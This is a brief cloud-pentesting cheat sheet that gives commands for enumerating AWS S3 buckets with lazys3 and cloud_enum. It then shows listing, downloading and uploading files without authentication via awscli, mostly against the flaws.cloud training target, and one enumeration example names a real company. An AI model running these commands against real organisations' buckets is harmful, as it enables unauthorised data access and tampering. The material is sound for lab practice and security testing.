S3 Bucket Enumeration
Lazys3 - Ruby Script
ruby lazys3.rb <company>
ruby lazys3.rb pakwheels
Cloud_enum
sudo apt install cloud-enum
cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp
S3BucketList - Browser Extension
Manual Installation
Exploiting S3 UnAuthenticated
sudo apt-get install awscli
cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp
aws s3 ls s3://flaws.cloud/ --no-sign-request
Download -
aws s3 cp s3://flaws.cloud/secret.html ./ --no-sign-request
Upload -
aws s3 cp ./index.html s3://flaws.cloud/secret.html --no-sign-request
Exploiting S3 Authenticated
Create a free AWS account
Go to AWS IAM dashboard
Users → Add New user with programmatic access credential type
Once user is created, note down the
access key
andsecret access key
Click User → Permissions → Add permissions → Attach existing policies →
AmazonS3FullAccess
aws configure --profile someone
aws s3 --profile someone ls s3://flaws.cloud/ --no-sign-request
aws s3 --profile someone cp s3://flaws.cloud/something.html ./
Last updated